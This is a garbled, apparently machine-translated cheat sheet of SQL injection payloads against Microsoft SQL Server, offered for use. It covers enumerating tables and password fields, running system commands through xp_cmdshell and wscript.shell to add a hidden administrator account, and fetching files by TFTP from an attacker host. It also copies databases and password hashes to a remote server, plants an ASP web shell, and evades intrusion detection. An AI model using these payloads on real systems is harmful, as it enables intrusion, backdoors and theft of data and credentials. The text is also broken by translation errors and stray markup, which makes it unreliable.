Standard injection statement 1. Judgment is an injection point; and 1 = 1 and 1 = 2 2. Guess the name of the general table is nothing more than Admin Adminuser user pass password et al .. And 0 <> (Select Count (*) from * ) and 0 <> (*) --- Judging whether there is admin to have this table 3. Guess number If you encounter 0
_NAME FROM INFORMATION_blank> _SCHEMA.COLUMNS WHERE TABLE_blank> _NAME = logintable WHERE COLUMN_blank> _NAME NOT IN (login_blank> _id) - UNION SELECT TOP 1 COLUMN_blank> _NAME FROM INFORMATION_blank> _SCHEMA.COLUMNS WHERE TABLE_blank> _NAME = logintable WHERE COLUMN_blank> _NAME NOT IN (login_blank> _id, login_blank> _name) - UNION SELECT TOP 1 login_blank> _name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank> _name = Rahul-- see _blank> server = hit wrong patch hit SP4 patch AND 1 = (Select @@ version) - Look at the _blank> Database connection account, return to normal, prove is _blank> server role sysadmin permissions. AND 1 = (select is_blank> _srvrolemember (sysadmin)) - Judging the connection _blank> database account.
(Use the SA account connection to return normal = proof the connection account is sa) and sa = (select system_blank> _user) - and user_blank> _name () = dbo - and 0 <> (SELECT user_blank> _name () Xp_blank> _cmdshell deletes and 1 = (select count (*) from master.dbo.sysobjects where xtype = x and name = xp_blank> _cmdshell) - XP_blank> _cmdshell is deleted, restored, support absolute path recovery; Exec Master. dbo.sp_blank> _addextendedproc xp_blank> _cmdshell, xplog70.dll -; EXEC master.dbo.sp_blank> _addextendedproc xp_blank> _cmdshell, c: /inetpub/wwwroot/xplog70.dll-- reverse PING own experiments; use master; declare @ s Int; Exec sp_blank> _oAcreate "wscript.shell", @ s out; exec sp_blank> _oamethod @s, "run", null, "cmd.exe / c ping 192.168.0.1"; - account number; declare @Shell INT EXEC SP_BLANK> _oAcreate wscript.shell, @ shell output exec sp_blank> _oamethod @ shell, run, null, c: /winnt/system32/cmd.exe / c net user jiaoniang $ 1866574 / add - Create a virtual directory E disk :; Declare @o int exec sp_blank> _oAcreate wscript.shell, @o out exec sp_blank> _oAmethod @o, run, null, cscript.exe c: /inetpub/wwroot/mkwebdir.vbs -w "default Web site" -V "e", "e: /" - Access attribute: (with writing a webhell) Declare @o INT EXEC SP_BLANK> _oAcreate wscript.shell, @o out exec sp_blank> _oAmethod @o, run, null, cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / e browse explosion library special _BLANK> Tips ::% 5C = / or Put / and / Modify% 5 Submit an AND 0 <> (SELECT TOP 1 Paths from NewTable) - Get the library name (from 1 to 5 is the iD, 6 or more Can be judged) AND 1 = (select name from master.dbo.sysdatabasees where dbid = 7) - and 0 <> (select count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) Submit DBID =
7, 8, 9 .... get more _blank> Database name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = u) Vethas a table assumes to admin and 0 <> ( Select Top 1 Name from bbs.dbo.sysObjects where xtype = u and name not in (admin)) to get other tables. AND 0 <> (Select Count (*) from bbs.dbo.sysObjects where xtype = u and name = admin and uid> (STR (ID))) Value Value Value assumes 18779569 UID = ID and 0 <> ( Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_blank> _id and 0 <> (Select Top 1 Name from bbs.dbo.syscolumn where id = 18779569 and name not in (ID, ...)) to fade other fields and 0 <(select user_blank> _id from bbs.dbo.admin where username> 1) You can get the _blank> password in order. . . . .
Assume that there is a user_blank> _id username, password and other fields and 0 <> (select count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) and 0 <> (select top 1 name from bbs.dbo.sysObjects WHERE XTYPE = U) Get a table name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = u and name not in (address)) and 0 <> (select count (*) from bbs.dbo. Sysobjects where xtype = u and name = admin and uid> (ID))) Determined ID value and 0 <> (select top 1 name from bbs.dbo.syscolumns where id = 773577794) All fields? id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin? ID = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7 , 8, *, 9, 10, 11, 12, 13 from admin (union, access) Get web path; Create Table [DBO]. [Swap] ([swappass] [char] (255)); - and (Select Top 1 Swappass from Swap) = 1 -; Create Table NewTable (ID Int Id Id Id ") Declare @test Varchar (20) EXEC MASTER..XP_BLANK> _REGREAD @rootkey = HKEY_BLANK> _LOCAL_BLANK> _MACHINE, @ key = system / currentControlset / Services / W3SVC / parameters / virtual roots /, @Value_blank> _name = /, value = @ Test Output Insert Into Paths (PA TH) VALUES (@test) -; use ku1; -; create table cmd (str image); - Create an Image type table CMD exists in XP_blank> _cmdshell test process:; exec master..xp_blank> _cmdshell DIR; exec master.dbo.sp_blank> _addlogin jiaoniang $; - plus SQL account; exec master.dbo.sp_blank> _password null, jiaoniang $, 1866574; -; exec master.dbo.sp_blank> _addsrvrolemember jiaoniang $ sysadmin; -; exec master.dbo.xp_blank> _cmdshell net user jiaoniang $ 1866574 / workstations: * / times: all / passwordchg: yes / passwordreq: yes / active: yes / add; -; exec master.dbo.xp_blank> _cmdshell net localgroup administrators Jiaoniang $ / add; - exec master..xp_blank>
_servicecontrol start, schedule start _blank> Services exec master..xp_blank> _servicecontrol start, server; DECLARE @shell INT EXEC SP_blank> _OACREATE wscript.shell, @ shell OUTPUT EXEC SP_blank> _OAMETHOD @ shell, run, null, C: / WINNT /system32/cmd.exe / c net user jiaoniang $ 1866574 / add; DECLARE @shell INT EXEC SP_blank> _OACREATE wscript.shell, @ shell OUTPUT EXEC SP_blank> _OAMETHOD @ shell, run, null, C: / WINNT / system32 / cmd .exe / c net localgroup administrators jiaoniang $ / add; exec master..xp_blank> _cmdshell tftp -i youip get file.exe - Using TFTP upload file; declare @a sysname set @ a = xp_blank> _ cmdshell exec @A DIR C: /; DECLARE @A sysname set @ a = xp _blank> _cm ' ' dshell exec @A DIR C: /; declare @A; set @ a = db_blank> _name (); backup Database @a to disk = Your IP Your shared directory BAK.DAT can be. Select * from OpenRowSet (_BLANK> SQLOLEDB, Server; Sa;, SELECT OK! EXEC MASTER.DBO.SP_BLANK> _ADDLOGIN HAX) Query Construction: SELECT * from news where id = ... and topic = ... .. Adminand 1 = (Select Count (*) from [user] where username = Victim and Right (left (userpass, 01), 1) = 1) And userpass <> select 123; -; A or name Like Fff%; - Show a user named ffff.
And 1 <> (EMAIL) "); -; Update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) Where name = fff; Update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = fff; -; Update [users] set email = (select top 1 name from sysobjects where xtype = u and ID> 581577110) Where name = fff; -; Update [users] set email = (select top 1 count (id) wHERE name = fff; -; update [users] set email = (SELECT TOP 1 PWD From password where id = 2) where name = fff; -; update [users] set email = (select top 1 name from password where id = 2) where name = fff; - The above statement is to get _blank> database The first user table and put the table name in the mailbox field of the FFFF user. By looking at the user information of FFFF, you can get the first table called AD and get the ID of this table according to the table name Ad get the second table. Insert Into Users VALUES (666, Char (0x63) char (0x68) char (0x72) char (0x69) char (0x73), char (0x63) char (0x68) char (0x72) char (0x69) char (0x73), 0xfff) - Insert Into Users Values (667, 123, 123, 0xfffff) - Insert INTO Users Values (123, Admin -, Password, 0xfff) -; And User> 0; and (select count (*) from sysobjects> 0; and (select count (*) from mysysObjects) > 0 // Enumerate the data table name for the Access_blank> database; Update AAA SET AAA = (Select Top 1 Name from sysObjects where xtype = u and status> 0); - This is updated to the first table name to AAA Fields. Read the first table, the second table can be read out (adding the table name just got after the condition). Update aaa set aaa = (Select Top 1 Name from sysobjects where xtype = u and status> 0 and name <> vote); - then id = 1552 and exists (SELECT * from AAA WHERE AAA> 5) reads the second A table, one by one, until there is not.
Reading field is like this: Update aaa set aaa = (select top 1 col_blank> _name (object_blank> _id (table name), 1)); - then id = 152 and exists (SELECT * from aaa where aaa> 5) error Get field name; Update AAA SET AAA = (Select Top 1 Col_blank> _Name (Object_blank> _ID (Name), 2)); - then id = 152 and exists (Select * from aaa where aaa> 5) error, Get field name [get data table name] [update the field value as a table name, then you can get the table name] Update table name set field = (select top 1 name from sysobjects where xtype = u and) WHERE XTYPE = u and Status> 0 [and name <> you get the table name Identified one plus one]) [WHER Condition] Select Top 1 Name from sysobjects where xtype = u and status> 0 and name not in (Table1, Table2, ... ) Injecting _blank> vulnerability _blank> Database Administrator account and system administrator account [Current account must be sysadmin group] [Get Data Table Field Name] [Update the field value to field name, then read this The value of the field can get a field name] Update table name set field = (select top 1 col_blank> _name (object_blank> _id (to query the data table name), field list,: 1) [WHERE condition] bypass IDS detection [Use variable]; declare @a sysname set @ a = xp_blank> _ cmdshell exec @a dir c: /; declare @a sysname set @ a = xp _blank> _cm ' ' dshell exec @a Dir C: / 1. Open the remote _blank> database basic syntax Select * from OpenRowSet (SQLOLEDB, Server = ServerName; UID = SA; PWD = 123, select * from table1) parameter: (1) OLEDB Provider Name 2, where the connection string parameters can be used to connect, such as Select * from OpenRowSet (SQLOLDB, UID = SA; PWD = 123; Network = dbms SoCn; address = 192.168.0.1, 1433; Select * from table3. Copy the entire _BLANK> Database INSERT of the target host to the local table. Basic syntax: INSERT INTO OPENROWSET (SQLOLEDB, Server = ServerName; UID = SA; PWD = 123, select * from table1) Select * from table2 This row statement copies all data in Table2 table on Table2 table on the target host_blank> database The Table1 table in the table.
The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet (SQLOLDB, UID = SA; PWD = 123; Network = dbms SoCn; address = 192.168.0.1, 1433; SELECT * from table1) select * from table2 insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysdatabases) select * from master.dbo.sysdatabases insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysobjects) select * from user_blank> _database.dbo.sysobjects insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _syscolumns) select * from user_blank> _database.dbo.syscolumns replicate _blank> database: insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from table1) select * from database..table1 insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433; The password has been stored in sysxlogins. As follows: insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1,1433;, select * from _blank> _sysxlogins) obtained after select * from database.dbo.sysxlogins hash, it Violent cracking can be performed.
Ways of traversal catalog: Create a temporary table first: Temp; Create Table Temp (ID NVARCHAR (255), NUM1 NVARCHAR (255), NUM3 NVARCHAR (255)); -; INSERT TEMP EXEC MASTER. DBO.XP_BLANK> _AVAILAMEDIA; - Get all current drives; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _SUBDIRS C: /; - List of subdirectory; Insert Into Temp (ID, Num1) Exec Master.dbo .XP_BLANK> _DIRTREE C: /; - Gets a directory tree structure of all subdireuses, inch into the TEMP table; Insert Into Temp (ID) exec master.dbo.xp_blank> _cmdshell type c: /web/index.asp; - View the content of a file; Insert Into Temp (ID) exec master.dbo.xp_blank> _cmdshell dir c: /; -; insert INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _CMDSHELL DIR C: / * .asp / s / a; -; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_BLANK> _CMDshell Cscript C: /inetpub/adminscripts/adsutil.vbs Enum W3SVC; Insert Into Temp (ID, NUM1) Exec Master.dbo .XP_BLANK> _DIRTREE C: /; - (XP_BLANK> _Dirtree Applicable Public) Write Table: Statement 1: And 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (SYSADMIN)); - Statement 2: And 1 = (SELECT IS_BLANK> _SrvroleMember (ServerAdmin)); - Statement 3: And 1 = (SELECT IS_BLANK> _SRVROLEMEMBER (SETUPADMIN)); - Statement 4: And 1 = (SELECT IS_BL Ank> _SrvroleMember (SECURITYADMIN); - Statement 5: and 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (SECURITYADMIN)); - Statement 6: And 1 = (SELECT IS_BLANK> _SRVROLEMEMEMEMBER (DiskAdmin)); - Statement 7: And 1 = (SELECT IS_BLANK> _SRVROLEMEMBER (BULKADMIN)); - Statement 8: and 1 = (SELECT IS_BLANK> _SRVROLEMEMEMBER (BULKADMIN)); - Statement 9: And 1 = (SELECT IS_BLANK> _MEMBER (DB_BLANK> _OWNER)); - Write the path to the table:; Create Table DIRS (Paths Varchar (100), ID Int) -; Insert Dirs Exec Master.dbo.xp_blank> _dirtree C: / - And 0 <> (SELECT TOP 1 Paths from dirs - and 0 <> (Select Top 1 Paths from Dirs where paths not in (@
INETPUB) -; Create Table Dirs1 (Paths Varchar (100), ID Int) -; Insert Dirs EXEC MASTER.DBO.XP_BLANK> _DIRTREE E: / Web - And 0 <> (Select Top 1 Paths from Dirs1) - Back to web directory: Download; Declare @a sysname; set @ a = db_blank> _name (); backup database @a to disk = e: /web/down.bak; - and 1 = (Select Top 1 Name from (SELECT TOP 12 ID, NAME from sysobjects where xtype = char (85)) T ORDER BY ID DESC) AND 1 = (SELECT TOP 1 Col_blank> _Name (Object_blank> _ID (user_blank> _login), 1 "From sysobjects) See related tables.
and 1 = (select user_blank> _id from USER_blank> _LOGIN) and 0 = (select user from USER_blank> _LOGIN where user> 1) - = - wscript.shell example - = - declare @o int exec sp_blank> _oacreate wscript.shell, @o out exec sp_blank> _oamethod @o, run, NULL, notepad.exe; declare @o int exec sp_blank> _oacreate wscript.shell, @o out exec sp_blank> _oamethod @o, run, NULL, notepad.exe-- declare @o int, @RET, @T int, @ret int declare @line varchar (8000) Exec sp_blank> _oacreate scripting.FileSystemObject, @o out exec sp_blank> _oAMethod @o, opentextfile, @f out, c: / boot .ini, 1 exec @ret = sp_blank> _oAmethod @f, readline, @line out while (@ret = 0) begin print @line exec @ret = sp_blank> _oamethod @f, readline, @line out end end declare @o int @Line out , @f int, @T, @ret int exec sp_blank> _oAcreate scripting.FilesystemObject, @o out exec sp_blank> _oamethod @o, createtetextfile, @f out, c: /inetpub/wwwroot/foo.asp, 1 exec @ RET = SP_BLANK> _OAMETHOD @f, writeline, null, <% set o = server.createObject ("wscript.shell": o.run (r equest.querystring ( "cmd"))%> declare @o int, @ret int exec sp_blank> _oacreate speech.voicetext, @o out exec sp_blank> _oamethod @o, register, NULL, foo, bar exec sp_blank> _oasetproperty @o , Speed, 150 Exec Sp_blank >_oamethod @o, Speak, Null, All Your Sequel Servers Are Belong To, US, 528 Waitfor Delay 00:00:05; Declare @o int, @ret int exec sp_blank> _oacreate speech.voicetext, @o out exec sp_blank> _OAMethod @o, register, null, foo, bar exec sp_blank>
